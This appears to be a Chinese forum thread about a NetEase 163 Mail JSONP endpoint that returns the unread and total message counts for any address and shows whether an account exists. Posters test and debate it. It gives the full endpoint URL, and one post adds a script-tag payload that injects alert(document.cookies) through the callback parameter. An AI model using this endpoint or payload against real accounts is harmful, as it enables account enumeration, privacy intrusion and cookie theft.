在微博上看到"网易 改变邮箱地址参数，就能查看任意 163 邮箱的未读邮件数和邮件总数！！"

试了三个邮箱， 163 的准， 126 和 yeah.net 的不准。

根据楼上的描述，我猜测事情的经过是这样的
13 年的时候爆了这个漏洞之后，上级命令程序员赶紧修复。
奈何接口太老(根据返回的数据非 json 等结构化数据推测的)，代码已经面目全非。所以程序员无奈之下只好让非法邮箱返回个随机结果。。。

已验证几个邮箱，结果并不准。

改密码改密保已经改到心累了，现在。。。

New Message:0 Totoal Message:1145

@v2what 正解， 163 是准的

能被利用获取个人信息的才算漏洞吧，这个只是个接口，只能得到两个数字，这也算的话那各大公司的类似接口多了去了

@skywatcher 这两个数字在特定情形下很有价值。

试了下自己的 163 ，准确无误

163 邮箱存在，返回正确结果。不存在此 163 ，随机返回。

我刚刚实验楼下，是真实有效的漏洞。

@juneszh +1

jsonp 接口
http://msg.mail.163.com/cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=1&style=1&template=newmsgres_setcookie.htm&df=reg163&callback=fUnreadCountCall&username=xxx@163.com

fUnreadCountCall("5461","5608","xxx@163.com")

http://msg.mail.163.com/cgi/mc?funcid=getusrnewmsgcnt&username= 值为空也可以返回

试了下，确实可以，网易药丸

@ggiiss

<script src="http://msg.mail.163.com/cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=1&style=1&template=newmsgres_setcookie.htm&df=reg163&callback=alert(document.cookies);alert&username=xxx@163.com"></script>

这个漏洞两年前就有了，一直没修过……

只能确认邮件地址存在，然。。。

不想再评论网易了，就如我对中国男足的感受那样～

总数不准